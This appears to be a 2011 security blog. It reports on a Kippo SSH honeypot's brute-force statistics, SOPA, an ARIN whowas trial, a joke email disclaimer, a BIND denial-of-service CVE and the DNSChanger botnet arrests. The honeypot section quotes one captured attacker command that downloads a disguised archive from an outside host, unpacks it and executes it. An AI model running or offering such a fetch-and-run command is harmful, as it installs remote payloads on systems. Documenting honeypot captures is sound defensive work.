spamversand

Today I received a notification from projecthoneypot.org
that one of my donated spamtrap-domains helped to catch a new
harvester. Feels good to be able to help

After trying to build some nice graphs for the kippo-honeypot with PyCha I found

this little toolbox making things way better than I did:

kippo-graph Homepage (link fixed)

Here are the first results from my honeypot: (no live db-queries made, so Inputs
are not visible right now) Kippo-Stats

The kippo honeypot is now running for about a week..

Up to now I have seen

* more than 1.3 Million Connects

* more than 7.100 successful logins

* > 2.200 commands typed

* more than 2.100 different Source IP addresses

* 178 Files uploaded, most of them psyBNC bouncers

Whow.. I expected *some* brute-force atempts, but that much?

The sshd – honeypot named kippo is a fun tool to play with. After installing it I found
more than 1000 successful logins in about 12 hours! Most logins do nothing
after having success, but some are downloading files and try to do “things”:

-rw——- 1 kippo kippo 81211778 Dec 6 23:20 20111206231910_http___download_microsoft_com_download_win2000platform_SP_SP3_NT5_EN_US_W2Ksp3_exe
-rw——- 1 kippo kippo 34603008 Dec 7 01:19 20111207011938_http___download_microsoft_com_download_win2000platform_SP_SP3_NT5_EN_US_W2Ksp3_exe
-rw——- 1 kippo kippo 53477376 Dec 7 01:21 20111207012055_http___download_microsoft_com_download_win2000platform_SP_SP3_NT5_EN_US_W2Ksp3_exe
-rw——- 1 kippo kippo 3513408 Dec 7 01:21 20111207012120_http___www_steampowered_com_download_hldsupdatetool_bin
-rw——- 1 kippo kippo 608074 Dec 7 08:46 20111207084559_http___4u_moy_su_bnc_jpg

coming from commands like:

CMD: wget http://4u.moy.su/bnc.jpg;tar zxvf bnc.jpg;rm -rf bnc.jpg;cd .log;./go

I will try to build some public stats later..

A twitter-message:

“Under SOPA, you could get 5 years for uploading a Michael Jackson
song, one year more than the doctor who killed him.”

For those who don’t know, what SOPA means:

http://en.wikipedia.org/wiki/Stop_Online_Piracy_Act

An email from MAAWG informed me about a new service showing up at ARIN:

There is a new “whowas” – service showing historical data for an IP or ASN.
It will be publicly available in a trial version at:https://www.arin.net/resources/whowas/.

one goal of the trial is to gather data about use cases and how
often the service would be used to determine whether to work on that goal.

So let’s see if this service can be helpful to us.

The following email disclaimer was found in a mail to the mailing list
“full disclosure”.
Sounds funny to me

####################################################
***** IMPORTANT INFORMATION/DISCLAIMER *****

This document should be read only by those persons to whom it is addressed. If you have received this message it was obviously addressed to you and therefore you can read it, even it we didn’t mean to send it to you. However, if the contents of this email make no sense whatsoever then you probably were not the intended recipient, or, alternatively, you are a mindless cretin; either way, you should immediately kill yourself and destroy your computer (not necessarily in that order). Once you have taken this action, please contact us.. no, sorry, you can’t use your computer, because you just destroyed it, and possibly also committed suicide afterwards, but I am starting to digress……

The originator of this email is not liable for the transmission of the information contained in this communication. Or are they? Either way it’s a pretty dull legal query and frankly one I’m not going to dwell on. But should you have nothing better to do, please feel free to ruminate on it, and please pass on any concrete conclusions should you find them. However, if you pass them on via email, be sure to include a disclaimer regarding liability for transmission.

In the event that the originator did not send this email to you, then please return it to us and attach a scanned-in picture of your mother’s brother’s wife wearing nothing but a kangaroo suit, and we will immediately refund you exactly half of what you paid for the can of Whiskas you bought when you went to Pets At Home yesterday.

We take no responsibility for non-receipt of this email because we are running Exchange 5.5 and everyone knows how glitchy that can be. In the event that you do get this message then please note that we take no responsibility for that either. Nor will we accept any liability, tacit or implied, for any damage you may or may not incur as a result of receiving, or not, as the case may be, from time to time, notwithstanding all liabilities implied or otherwise, ummm, hell, where was I…umm, no matter what happens, it is NOT, and NEVER WILL BE, OUR FAULT!

The comments and opinions expressed herein are my own and NOT those of my employer, who, if he knew I was sending emails and surfing the seamier side of the Internet, would cut off my manhood and feed it to me for afternoon tea.

J.D. Falk, well known as beiing a board member of CAUCE (Coalition against unsolicited commercial email) and organizer of MAAWG-meetings died of cancer yesterday.
One last RFC written by him was finished just hours before he passed away by an extraordinary work of the IETF: RFC 6449

Shortly after the last remote DoS vulnerability of bind 9 ISC announced another possibilty to crash a server (this time only on recursive resolvers). See CVE-2011-4313 for more infos.

The FBI announced the arrest of 6 estonian nationals for creating the worlds biggest botnet (DNSChanger) so far:
FBI Announcement

German magazin Heise made also an article about that:
Heise-Link